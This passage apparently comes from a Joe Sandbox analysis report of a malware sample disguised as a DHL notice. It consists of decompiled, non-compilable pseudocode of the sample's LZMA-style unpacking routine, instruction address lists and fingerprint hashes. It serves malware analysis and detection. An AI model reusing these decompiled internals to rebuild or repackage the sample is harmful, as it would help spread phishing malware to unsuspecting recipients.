                                                            													if( *(__ebp - 0x10) >= 0x1000000) {
                                                            														L101:
                                                            														_t338 = __ebp - 0x48;
                                                            														 *_t338 =  *(__ebp - 0x48) - 1;
                                                            														__eflags =  *_t338;
                                                            														goto L102;
                                                            													} else {
                                                            														goto L99;
                                                            													}
                                                            												}
                                                            												__edx =  *(__ebp - 4);
                                                            												__eax = __eax - __ebx;
                                                            												 *(__ebp - 0x40) = __ecx;
                                                            												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                            												goto L108;
                                                            											case 0x1a:
                                                            												L56:
                                                            												__eflags =  *(__ebp - 0x64);
                                                            												if( *(__ebp - 0x64) == 0) {
                                                            													 *(__ebp - 0x88) = 0x1a;
                                                            													goto L170;
                                                            												}
                                                            												__ecx =  *(__ebp - 0x68);
                                                            												__al =  *(__ebp - 0x5c);
                                                            												__edx =  *(__ebp - 8);
                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            												 *( *(__ebp - 0x68)) = __al;
                                                            												__ecx =  *(__ebp - 0x14);
                                                            												 *(__ecx +  *(__ebp - 8)) = __al;
                                                            												__eax = __ecx + 1;
                                                            												__edx = 0;
                                                            												_t192 = __eax %  *(__ebp - 0x74);
                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                            												__edx = _t192;
                                                            												goto L80;
                                                            											case 0x1b:
                                                            												L76:
                                                            												__eflags =  *(__ebp - 0x64);
                                                            												if( *(__ebp - 0x64) == 0) {
                                                            													 *(__ebp - 0x88) = 0x1b;
                                                            													goto L170;
                                                            												}
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__edx =  *(__ebp - 8);
                                                            												__cl =  *(__eax + __edx);
                                                            												__eax =  *(__ebp - 0x14);
                                                            												 *(__ebp - 0x5c) = __cl;
                                                            												 *(__eax + __edx) = __cl;
                                                            												__eax = __eax + 1;
                                                            												__edx = 0;
                                                            												_t275 = __eax %  *(__ebp - 0x74);
                                                            												__eax = __eax /  *(__ebp - 0x74);
                                                            												__edx = _t275;
                                                            												__eax =  *(__ebp - 0x68);
                                                            												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                            												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            												_t284 = __ebp - 0x64;
                                                            												 *_t284 =  *(__ebp - 0x64) - 1;
                                                            												__eflags =  *_t284;
                                                            												 *( *(__ebp - 0x68)) = __cl;
                                                            												L80:
                                                            												 *(__ebp - 0x14) = __edx;
                                                            												goto L81;
                                                            											case 0x1c:
                                                            												while(1) {
                                                            													L123:
                                                            													__eflags =  *(__ebp - 0x64);
                                                            													if( *(__ebp - 0x64) == 0) {
                                                            														break;
                                                            													}
                                                            													__eax =  *(__ebp - 0x14);
                                                            													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            													__eflags = __eax -  *(__ebp - 0x74);
                                                            													if(__eax >=  *(__ebp - 0x74)) {
                                                            														__eax = __eax +  *(__ebp - 0x74);
                                                            														__eflags = __eax;
                                                            													}
                                                            													__edx =  *(__ebp - 8);
                                                            													__cl =  *(__eax + __edx);
                                                            													__eax =  *(__ebp - 0x14);
                                                            													 *(__ebp - 0x5c) = __cl;
                                                            													 *(__eax + __edx) = __cl;
                                                            													__eax = __eax + 1;
                                                            													__edx = 0;
                                                            													_t414 = __eax %  *(__ebp - 0x74);
                                                            													__eax = __eax /  *(__ebp - 0x74);
                                                            													__edx = _t414;
                                                            													__eax =  *(__ebp - 0x68);
                                                            													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                            													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                            													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                            													__eflags =  *(__ebp - 0x30);
                                                            													 *( *(__ebp - 0x68)) = __cl;
                                                            													 *(__ebp - 0x14) = _t414;
                                                            													if( *(__ebp - 0x30) > 0) {
                                                            														continue;
                                                            													} else {
                                                            														L81:
                                                            														 *(__ebp - 0x88) = 2;
                                                            														goto L1;
                                                            													}
                                                            												}
                                                            												 *(__ebp - 0x88) = 0x1c;
                                                            												goto L170;
                                                            										}
                                                            									}
                                                            									L171:
                                                            									_t535 = _t534 | 0xffffffff;
                                                            									goto L172;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            					goto L1;
                                                            				}
                                                            			}













                                                            0x004075f4
                                                            0x004075f6
                                                            0x004075fd
                                                            0x00407601
                                                            0x00407601
                                                            0x0040742c
                                                            0x00407433
                                                            0x0040743b
                                                            0x0040743e
                                                            0x00407441
                                                            0x00407441
                                                            0x00407447
                                                            0x00407447
                                                            0x00406be3
                                                            0x00406be3
                                                            0x00406be3
                                                            0x00406bec
                                                            0x00000000
                                                            0x00000000
                                                            0x00406bf2
                                                            0x00000000
                                                            0x00406bfd
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c06
                                                            0x00406c09
                                                            0x00406c0c
                                                            0x00406c10
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c16
                                                            0x00406c19
                                                            0x00406c1b
                                                            0x00406c1c
                                                            0x00406c1f
                                                            0x00406c21
                                                            0x00406c22
                                                            0x00406c24
                                                            0x00406c27
                                                            0x00406c2c
                                                            0x00406c31
                                                            0x00406c3a
                                                            0x00406c4d
                                                            0x00406c50
                                                            0x00406c5c
                                                            0x00406c84
                                                            0x00406c86
                                                            0x00406c94
                                                            0x00406c94
                                                            0x00406c98
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406c88
                                                            0x00406c88
                                                            0x00406c8b
                                                            0x00406c8c
                                                            0x00406c8c
                                                            0x00000000
                                                            0x00406c88
                                                            0x00406c62
                                                            0x00406c67
                                                            0x00406c67
                                                            0x00406c70
                                                            0x00406c78
                                                            0x00406c7b
                                                            0x00000000
                                                            0x00406c81
                                                            0x00406c81
                                                            0x00000000
                                                            0x00406c81
                                                            0x00000000
                                                            0x00406c9e
                                                            0x00406c9e
                                                            0x00406ca2
                                                            0x0040754e
                                                            0x00000000
                                                            0x0040754e
                                                            0x00406cab
                                                            0x00406cbb
                                                            0x00406cbe
                                                            0x00406cc1
                                                            0x00406cc1
                                                            0x00406cc1
                                                            0x00406cc4
                                                            0x00406cc8
                                                            0x00000000
                                                            0x00000000
                                                            0x00406cca
                                                            0x00406cd0
                                                            0x00406cfa
                                                            0x00406d00
                                                            0x00406d07
                                                            0x00000000
                                                            0x00406d07
                                                            0x00406cd6
                                                            0x00406cd9
                                                            0x00406cde
                                                            0x00406cde
                                                            0x00406ce9
                                                            0x00406cf1
                                                            0x00406cf4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d39
                                                            0x00406d3f
                                                            0x00406d42
                                                            0x00406d4f
                                                            0x00406d57
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d0e
                                                            0x00406d0e
                                                            0x00406d12
                                                            0x0040755d
                                                            0x00000000
                                                            0x0040755d
                                                            0x00406d1e
                                                            0x00406d29
                                                            0x00406d29
                                                            0x00406d29
                                                            0x00406d2c
                                                            0x00406d2f
                                                            0x00406d32
                                                            0x00406d37
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004073ce
                                                            0x004073ce
                                                            0x004073d4
                                                            0x004073da
                                                            0x004073e0
                                                            0x004073fa
                                                            0x004073fd
                                                            0x00407403
                                                            0x0040740e
                                                            0x00407410
                                                            0x004073e2
                                                            0x004073e2
                                                            0x004073f1
                                                            0x004073f5
                                                            0x004073f5
                                                            0x0040741a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406d5f
                                                            0x00406d61
                                                            0x00406d64
                                                            0x00406dd5
                                                            0x00406dd8
                                                            0x00406ddb
                                                            0x00406de2
                                                            0x00406dec
                                                            0x004073cb
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00406d66
                                                            0x00406d6a
                                                            0x00406d6d
                                                            0x00406d6f
                                                            0x00406d72
                                                            0x00406d75
                                                            0x00406d77
                                                            0x00406d7a
                                                            0x00406d7c
                                                            0x00406d81
                                                            0x00406d84
                                                            0x00406d87
                                                            0x00406d8b
                                                            0x00406d92
                                                            0x00406d95
                                                            0x00406d9c
                                                            0x00406da0
                                                            0x00406da8
                                                            0x00406da8
                                                            0x00406da8
                                                            0x00406da2
                                                            0x00406da2
                                                            0x00406da2
                                                            0x00406d97
                                                            0x00406d97
                                                            0x00406d97
                                                            0x00406dac
                                                            0x00406daf
                                                            0x00406dcd
                                                            0x00406dcf
                                                            0x00000000
                                                            0x00406db1
                                                            0x00406db1
                                                            0x00406db4
                                                            0x00406db7
                                                            0x00406dba
                                                            0x00406dbc
                                                            0x00406dbc
                                                            0x00406dbc
                                                            0x00406dbf
                                                            0x00406dc2
                                                            0x00406dc4
                                                            0x00406dc5
                                                            0x00406dc8
                                                            0x00000000
                                                            0x00406dc8
                                                            0x00000000
                                                            0x00406ffe
                                                            0x00407002
                                                            0x00407020
                                                            0x00407023
                                                            0x0040702a
                                                            0x0040702d
                                                            0x00407030
                                                            0x00407033
                                                            0x00407036
                                                            0x00407039
                                                            0x0040703b
                                                            0x00407042
                                                            0x00407043
                                                            0x00407045
                                                            0x00407048
                                                            0x0040704b
                                                            0x0040704e
                                                            0x0040704e
                                                            0x00407053
                                                            0x00000000
                                                            0x00407053
                                                            0x00407004
                                                            0x00407007
                                                            0x0040700a
                                                            0x00407014
                                                            0x004073cb
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x00000000
                                                            0x00407068
                                                            0x0040706c
                                                            0x0040708f
                                                            0x00407092
                                                            0x00407095
                                                            0x0040709f
                                                            0x0040706e
                                                            0x0040706e
                                                            0x00407071
                                                            0x00407074
                                                            0x00407077
                                                            0x00407084
                                                            0x00407087
                                                            0x00407087
                                                            0x004073cb
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x00000000
                                                            0x004070ab
                                                            0x004070af
                                                            0x00000000
                                                            0x00000000
                                                            0x004070b5
                                                            0x004070b9
                                                            0x00000000
                                                            0x00000000
                                                            0x004070bf
                                                            0x004070c1
                                                            0x004070c5
                                                            0x004070c5
                                                            0x004070c8
                                                            0x004070cc
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407143
                                                            0x00407147
                                                            0x0040714e
                                                            0x00407151
                                                            0x00407154
                                                            0x00407149
                                                            0x00407149
                                                            0x00407149
                                                            0x00407157
                                                            0x0040715a
                                                            0x00000000
                                                            0x00000000
                                                            0x00407203
                                                            0x00407203
                                                            0x00407207
                                                            0x004075a5
                                                            0x00000000
                                                            0x004075a5
                                                            0x0040720d
                                                            0x00407210
                                                            0x00407213
                                                            0x00407217
                                                            0x0040721a
                                                            0x00407220
                                                            0x00407222
                                                            0x00407222
                                                            0x00407222
                                                            0x00407225
                                                            0x00407228
                                                            0x00000000
                                                            0x00000000
                                                            0x00406df8
                                                            0x00406df8
                                                            0x00406dfc
                                                            0x00407569
                                                            0x00000000
                                                            0x00407569
                                                            0x00406e02
                                                            0x00406e05
                                                            0x00406e08
                                                            0x00406e0c
                                                            0x00406e0f
                                                            0x00406e15
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e1a
                                                            0x00406e1d
                                                            0x00406e1d
                                                            0x00406e20
                                                            0x00406e23
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e29
                                                            0x00406e2f
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e35
                                                            0x00406e35
                                                            0x00406e39
                                                            0x00406e3c
                                                            0x00406e3f
                                                            0x00406e42
                                                            0x00406e45
                                                            0x00406e46
                                                            0x00406e49
                                                            0x00406e4b
                                                            0x00406e51
                                                            0x00406e54
                                                            0x00406e57
                                                            0x00406e5a
                                                            0x00406e5d
                                                            0x00406e60
                                                            0x00406e63
                                                            0x00406e7f
                                                            0x00406e82
                                                            0x00406e85
                                                            0x00406e88
                                                            0x00406e8f
                                                            0x00406e93
                                                            0x00406e95
                                                            0x00406e99
                                                            0x00406e65
                                                            0x00406e65
                                                            0x00406e69
                                                            0x00406e71
                                                            0x00406e76
                                                            0x00406e78
                                                            0x00406e7a
                                                            0x00406e7a
                                                            0x00406e9c
                                                            0x00406ea3
                                                            0x00406ea6
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eb1
                                                            0x00406eb1
                                                            0x00406eb5
                                                            0x00407575
                                                            0x00000000
                                                            0x00407575
                                                            0x00406ebb
                                                            0x00406ebe
                                                            0x00406ec1
                                                            0x004075fa
                                                            0x00000000
                                                            0x004075fa
                                                            0x00407447
                                                            0x004073ce
                                                            0x004073cb
                                                            0x00000000
                                                            0x00407120

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                            • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                                                            • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                                                            • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 98%
                                                            			E00407068() {
                                                            				unsigned short _t531;
                                                            				signed int _t532;
                                                            				void _t533;
                                                            				signed int _t534;
                                                            				signed int _t535;
                                                            				signed int _t565;
                                                            				signed int _t568;
                                                            				signed int _t589;
                                                            				signed int* _t606;
                                                            				void* _t613;
                                                            
                                                            				L0:
                                                            				while(1) {
                                                            					L0:
                                                            					if( *(_t613 - 0x40) != 0) {
                                                            						 *(_t613 - 0x84) = 0xa;
                                                            						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                                                            					} else {
                                                            						 *(__ebp - 0x84) = 9;
                                                            						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                            					}
                                                            					while(1) {
                                                            						 *(_t613 - 0x54) = _t606;
                                                            						while(1) {
                                                            							L133:
                                                            							_t531 =  *_t606;
                                                            							_t589 = _t531 & 0x0000ffff;
                                                            							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                            							if( *(_t613 - 0xc) >= _t565) {
                                                            								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                            								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                            								 *(_t613 - 0x40) = 1;
                                                            								_t532 = _t531 - (_t531 >> 5);
                                                            								 *_t606 = _t532;
                                                            							} else {
                                                            								 *(_t613 - 0x10) = _t565;
                                                            								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                            							}
                                                            							if( *(_t613 - 0x10) >= 0x1000000) {
                                                            								goto L139;
                                                            							}
                                                            							L137:
                                                            							if( *(_t613 - 0x6c) == 0) {
                                                            								 *(_t613 - 0x88) = 5;
                                                            								L170:
                                                            								_t568 = 0x22;
                                                            								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                            								_t535 = 0;
                                                            								L172:
                                                            								return _t535;
                                                            							}
                                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                            							L139:
                                                            							_t533 =  *(_t613 - 0x84);
                                                            							while(1) {
                                                            								 *(_t613 - 0x88) = _t533;
                                                            								while(1) {
                                                            									L1:
                                                            									_t534 =  *(_t613 - 0x88);
                                                            									if(_t534 > 0x1c) {
                                                            										break;
                                                            									}
                                                            									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                            										case 0:
                                                            											if( *(_t613 - 0x6c) == 0) {
                                                            												goto L170;
                                                            											}
                                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            											_t534 =  *( *(_t613 - 0x70));
                                                            											if(_t534 > 0xe1) {
                                                            												goto L171;
                                                            											}
                                                            											_t538 = _t534 & 0x000000ff;
                                                            											_push(0x2d);
                                                            											asm("cdq");
                                                            											_pop(_t570);
                                                            											_push(9);
                                                            											_pop(_t571);
                                                            											_t609 = _t538 / _t570;
                                                            											_t540 = _t538 % _t570 & 0x000000ff;
                                                            											asm("cdq");
                                                            											_t604 = _t540 % _t571 & 0x000000ff;
                                                            											 *(_t613 - 0x3c) = _t604;
                                                            											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                            											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                            											_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                            											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                            												L10:
                                                            												if(_t612 == 0) {
                                                            													L12:
                                                            													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                            													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            													goto L15;
                                                            												} else {
                                                            													goto L11;
                                                            												}
                                                            												do {
                                                            													L11:
                                                            													_t612 = _t612 - 1;
                                                            													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                            												} while (_t612 != 0);
                                                            												goto L12;
                                                            											}
                                                            											if( *(_t613 - 4) != 0) {
                                                            												GlobalFree( *(_t613 - 4));
                                                            											}
                                                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                            											 *(_t613 - 4) = _t534;
                                                            											if(_t534 == 0) {
                                                            												goto L171;
                                                            											} else {
                                                            												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                            												goto L10;
                                                            											}
                                                            										case 1:
                                                            											L13:
                                                            											__eflags =  *(_t613 - 0x6c);
                                                            											if( *(_t613 - 0x6c) == 0) {
                                                            												 *(_t613 - 0x88) = 1;
                                                            												goto L170;
                                                            											}
                                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                            											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                            											_t45 = _t613 - 0x48;
                                                            											 *_t45 =  *(_t613 - 0x48) + 1;
                                                            											__eflags =  *_t45;
                                                            											L15:
                                                            											if( *(_t613 - 0x48) < 4) {
                                                            												goto L13;
                                                            											}
                                                            											_t546 =  *(_t613 - 0x40);
                                                            											if(_t546 ==  *(_t613 - 0x74)) {
                                                            												L20:
                                                            												 *(_t613 - 0x48) = 5;
                                                            												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                            												goto L23;
                                                            											}
                                                            											 *(_t613 - 0x74) = _t546;
                                                            											if( *(_t613 - 8) != 0) {
                                                            												GlobalFree( *(_t613 - 8));
                                                            											}
                                                            											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                            											 *(_t613 - 8) = _t534;
                                                            											if(_t534 == 0) {
                                                            												goto L171;
                                                            											} else {
                                                            												goto L20;
                                                            											}
                                                            										case 2:
                                                            											L24:
                                                            											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                            											 *(_t613 - 0x84) = 6;
                                                            											 *(_t613 - 0x4c) = _t553;
                                                            											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                            											 *(_t613 - 0x54) = _t606;
                                                            											goto L133;
                                                            										case 3:
                                                            											L21:
                                                            											__eflags =  *(_t613 - 0x6c);
                                                            											if( *(_t613 - 0x6c) == 0) {
                                                            												 *(_t613 - 0x88) = 3;
                                                            												goto L170;
                                                            											}
                                                            											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                            											_t67 = _t613 - 0x70;
                                                            											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                            											__eflags =  *_t67;
                                                            											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                            											L23:
                                                            											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                            											if( *(_t613 - 0x48) != 0) {
                                                            												goto L21;
                                                            											}
                                                            											goto L24;
                                                            										case 4:
                                                            											L133:
                                                            											_t531 =  *_t606;
                                                            											_t589 = _t531 & 0x0000ffff;
                                                            											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                            											if( *(_t613 - 0xc) >= _t565) {
                                                            												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                            												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                            												 *(_t613 - 0x40) = 1;
                                                            												_t532 = _t531 - (_t531 >> 5);
                                                            												 *_t606 = _t532;
                                                            											} else {
                                                            												 *(_t613 - 0x10) = _t565;
                                                            												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                            												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                            											}
                                                            											if( *(_t613 - 0x10) >= 0x1000000) {
                                                            												goto L139;
                                                            											}
                                                            										case 5:
                                                            											goto L137;
                                                            										case 6:
                                                            											__edx = 0;
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x34) = 1;
                                                            												 *(__ebp - 0x84) = 7;
                                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                            												while(1) {
                                                            													 *(_t613 - 0x54) = _t606;
                                                            													goto L133;
                                                            												}
                                                            											}
                                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                            											__esi =  *(__ebp - 0x60);
                                                            											__cl = 8;
                                                            											__cl = 8 -  *(__ebp - 0x3c);
                                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                            											__ecx =  *(__ebp - 0x3c);
                                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                            											__ecx =  *(__ebp - 4);
                                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                            											__eflags =  *(__ebp - 0x38) - 4;
                                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            											if( *(__ebp - 0x38) >= 4) {
                                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                                            												if( *(__ebp - 0x38) >= 0xa) {
                                                            													_t98 = __ebp - 0x38;
                                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                                            													__eflags =  *_t98;
                                                            												} else {
                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                            												}
                                                            											} else {
                                                            												 *(__ebp - 0x38) = 0;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                                            											if( *(__ebp - 0x34) == __edx) {
                                                            												__ebx = 0;
                                                            												__ebx = 1;
                                                            												goto L61;
                                                            											} else {
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__ecx =  *(__ebp - 8);
                                                            												__ebx = 0;
                                                            												__ebx = 1;
                                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                            												goto L41;
                                                            											}
                                                            										case 7:
                                                            											__eflags =  *(__ebp - 0x40) - 1;
                                                            											if( *(__ebp - 0x40) != 1) {
                                                            												__eax =  *(__ebp - 0x24);
                                                            												 *(__ebp - 0x80) = 0x16;
                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            												__eax =  *(__ebp - 0x28);
                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            												__eax = 0;
                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            												__al = __al & 0x000000fd;
                                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                            												__eax =  *(__ebp - 4);
                                                            												__eax =  *(__ebp - 4) + 0x664;
                                                            												__eflags = __eax;
                                                            												 *(__ebp - 0x58) = __eax;
                                                            												goto L69;
                                                            											}
                                                            											__eax =  *(__ebp - 4);
                                                            											__ecx =  *(__ebp - 0x38);
                                                            											 *(__ebp - 0x84) = 8;
                                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                            											while(1) {
                                                            												 *(_t613 - 0x54) = _t606;
                                                            												goto L133;
                                                            											}
                                                            										case 8:
                                                            											goto L0;
                                                            										case 9:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												goto L89;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x60);
                                                            											if( *(__ebp - 0x60) == 0) {
                                                            												goto L171;
                                                            											}
                                                            											__eax = 0;
                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                            											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                            											__eflags = _t258;
                                                            											0 | _t258 = _t258 + _t258 + 9;
                                                            											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                            											goto L75;
                                                            										case 0xa:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x84) = 0xb;
                                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                            												while(1) {
                                                            													 *(_t613 - 0x54) = _t606;
                                                            													goto L133;
                                                            												}
